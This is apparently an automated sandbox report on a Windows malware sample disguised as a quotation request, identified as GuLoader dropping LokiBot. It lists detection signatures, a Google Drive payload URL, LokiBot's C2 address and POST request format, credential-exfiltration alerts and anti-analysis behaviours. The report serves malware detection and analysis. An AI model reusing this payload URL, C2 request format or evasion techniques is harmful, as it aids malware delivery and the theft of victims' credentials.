Windows Analysis Report RFQ No3756368.exe

Overview

General Information

Sample Name:	RFQ No3756368.exe
Analysis ID:	434725
MD5:	ce51f15d31008c3606729b00036fe841
SHA1:	9ed0987c6a26f61afb6fa772dce9b4a6ddd9090c
SHA256:	e4effdebb79bd1b3d2e3a2510a96f44cbf9ca4961340c7ca1f276bd3c527afb2
Tags:	exeLoki
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Potential malicious icon found

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Machine Learning detection for sample

Potentially malicious time measurement code found

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Signatures

AV Detection:

Found malware configuration

Source: RFQ No3756368.exe

Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=178gAB7Kg_oMzCSAzqF9y5fIXkgVf7x0t"}

Multi AV Scanner detection for submitted file

Source: RFQ No3756368.exe

Virustotal: Detection: 26%

Perma Link

Machine Learning detection for sample

Source: RFQ No3756368.exe

Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files

Source: RFQ No3756368.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: unknown

HTTPS traffic detected: 142.250.201.193:443 -> 192.168.2.4:49755 version: TLS 1.2

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49756 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49757 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49758 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49759 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49759 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49759 -> 63.141.228.141:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49759 -> 63.141.228.141:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://drive.google.com/uc?export=download&id=178gAB7Kg_oMzCSAzqF9y5fIXkgVf7x0t

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 63.141.228.141 63.141.228.141

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NOCIXUS NOCIXUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 190Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 163Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141
Source: unknown	TCP traffic detected without corresponding DNS query: 63.141.228.141

Source: unknown

DNS traffic detected: queries for: doc-14-7g-docs.googleusercontent.com

Source: unknown

HTTP traffic detected: POST /32.php/nuldTOn9SBn3G HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 8C21EEAEContent-Length: 190Connection: close

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Jun 2021 11:03:17 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2

Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://63.141.228.141/32.php/nuldTOn9SBn3G
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-7g-docs.googleusercontent.com/
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp, RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-7g-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/9u2nstv2
Source: RFQ No3756368.exe, 00000002.00000002.811546103.0000000000948000.00000004.00000020.sdmp	String found in binary or memory: https://doc-14-7g-docs.googleusercontent.com/ytq
Source: RFQ No3756368.exe, 00000002.00000002.811588234.0000000000965000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443

Source: unknown

HTTPS traffic detected: 142.250.201.193:443 -> 192.168.2.4:49755 version: TLS 1.2

System Summary:

Potential malicious icon found

Source: initial sample

Icon embedded in PE file: bad icon match: 20047c7c70f0e004

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\RFQ No3756368.exe

Process Stats: CPU usage > 98%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261706 NtProtectVirtualMemory,	0_2_02261706
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251014 EnumWindows,NtWriteVirtualMemory,LoadLibraryA,	0_2_02251014
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251973 NtWriteVirtualMemory,TerminateProcess,	0_2_02251973
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261DA6 NtSetInformationThread,	0_2_02261DA6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A99B NtWriteVirtualMemory,NtAllocateVirtualMemory,LoadLibraryA,	0_2_0225A99B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258E3C NtWriteVirtualMemory,	0_2_02258E3C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258A39 NtWriteVirtualMemory,	0_2_02258A39
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226220C NtSetInformationThread,	0_2_0226220C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258212 NtWriteVirtualMemory,	0_2_02258212
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262268 NtSetInformationThread,	0_2_02262268
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225926A NtWriteVirtualMemory,	0_2_0225926A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02259670 NtWriteVirtualMemory,	0_2_02259670
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AA72 NtAllocateVirtualMemory,	0_2_0225AA72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226225C NtSetInformationThread,	0_2_0226225C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261E58 NtSetInformationThread,	0_2_02261E58
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258EA6 NtWriteVirtualMemory,	0_2_02258EA6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022582A2 NtWriteVirtualMemory,	0_2_022582A2
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261EAC NtSetInformationThread,	0_2_02261EAC
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022586A8 NtWriteVirtualMemory,	0_2_022586A8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022596BF NtWriteVirtualMemory,	0_2_022596BF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261EC2 NtSetInformationThread,	0_2_02261EC2
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258ACF NtWriteVirtualMemory,	0_2_02258ACF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B2DB NtWriteVirtualMemory,LoadLibraryA,	0_2_0225B2DB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262327 NtSetInformationThread,	0_2_02262327
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225833D NtWriteVirtualMemory,	0_2_0225833D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225873D NtWriteVirtualMemory,	0_2_0225873D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226173E NtProtectVirtualMemory,	0_2_0226173E
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262304 NtSetInformationThread,	0_2_02262304
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AB0A NtAllocateVirtualMemory,	0_2_0225AB0A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02259310 NtWriteVirtualMemory,	0_2_02259310
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258F63 NtWriteVirtualMemory,	0_2_02258F63
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B72 NtWriteVirtualMemory,	0_2_02258B72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257F55 NtWriteVirtualMemory,	0_2_02257F55
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258B58 NtWriteVirtualMemory,	0_2_02258B58
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022623B6 NtSetInformationThread,	0_2_022623B6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261FBB NtSetInformationThread,	0_2_02261FBB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02262795 NtWriteVirtualMemory,LoadLibraryA,	0_2_02262795
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258FEC NtWriteVirtualMemory,	0_2_02258FEC
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02257FEE NtWriteVirtualMemory,	0_2_02257FEE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225ABE8 NtAllocateVirtualMemory,	0_2_0225ABE8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022583F7 NtWriteVirtualMemory,	0_2_022583F7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022617F4 NtProtectVirtualMemory,	0_2_022617F4
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022593FC NtWriteVirtualMemory,	0_2_022593FC
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022587DF NtWriteVirtualMemory,	0_2_022587DF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258C2B NtWriteVirtualMemory,	0_2_02258C2B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258035 NtWriteVirtualMemory,	0_2_02258035
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255837 NtWriteVirtualMemory,	0_2_02255837
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AC3B NtAllocateVirtualMemory,	0_2_0225AC3B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226200D NtSetInformationThread,	0_2_0226200D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258864 NtWriteVirtualMemory,	0_2_02258864
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258068 NtWriteVirtualMemory,	0_2_02258068
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226206B NtSetInformationThread,	0_2_0226206B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225847A NtWriteVirtualMemory,	0_2_0225847A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226244D NtSetInformationThread,	0_2_0226244D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022594B4 NtWriteVirtualMemory,	0_2_022594B4
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A8B7 NtWriteVirtualMemory,	0_2_0225A8B7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022620BE NtSetInformationThread,	0_2_022620BE
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225908C NtWriteVirtualMemory,	0_2_0225908C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022594EB NtWriteVirtualMemory,	0_2_022594EB
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022580CF NtWriteVirtualMemory,	0_2_022580CF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022624DF NtSetInformationThread,	0_2_022624DF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B0DF NtWriteVirtualMemory,	0_2_0225B0DF
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225912D NtWriteVirtualMemory,	0_2_0225912D
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258530 NtWriteVirtualMemory,	0_2_02258530
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225C133 NtWriteVirtualMemory,	0_2_0225C133
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D3F NtWriteVirtualMemory,	0_2_02258D3F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AD03 NtAllocateVirtualMemory,	0_2_0225AD03
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258D14 NtWriteVirtualMemory,	0_2_02258D14
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258118 NtWriteVirtualMemory,	0_2_02258118
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0226256B NtSetInformationThread,	0_2_0226256B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225BD7B NtWriteVirtualMemory,	0_2_0225BD7B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225894C NtWriteVirtualMemory,	0_2_0225894C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225814F NtWriteVirtualMemory,	0_2_0225814F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258557 NtWriteVirtualMemory,	0_2_02258557
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022581B0 NtWriteVirtualMemory,	0_2_022581B0
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02261DB3 NtSetInformationThread,	0_2_02261DB3
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022575BA NtWriteVirtualMemory,LoadLibraryA,	0_2_022575BA
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022595E0 NtWriteVirtualMemory,	0_2_022595E0
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022585F3 NtWriteVirtualMemory,	0_2_022585F3
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_022591D7 NtWriteVirtualMemory,	0_2_022591D7
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A9D8 NtAllocateVirtualMemory,	0_2_0225A9D8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572D40 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572D40
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572A72 LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572A72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572E96 NtProtectVirtualMemory,	2_2_00572E96
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572B07 LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572B07
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572A77 LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572A77
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572DF6 LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572DF6
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572DF8 LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572DF8
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572A65 LdrInitializeThunk,NtProtectVirtualMemory,	2_2_00572A65
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 2_2_00572BAB NtProtectVirtualMemory,	2_2_00572BAB

Detected potential crypto function

Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225E27F	0_2_0225E27F
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251014	0_2_02251014
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251973	0_2_02251973
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225A99B	0_2_0225A99B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225B62B	0_2_0225B62B
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258E3C	0_2_02258E3C
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258A39	0_2_02258A39
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225223A	0_2_0225223A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02255202	0_2_02255202
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02258212	0_2_02258212
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02260A6E	0_2_02260A6E
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225926A	0_2_0225926A
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251270	0_2_02251270
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_0225AA72	0_2_0225AA72
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251E43	0_2_02251E43
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02256E42	0_2_02256E42
Source: C:\Users\user\Desktop\RFQ No3756368.exe	Code function: 0_2_02251A56	0_2_02251A56
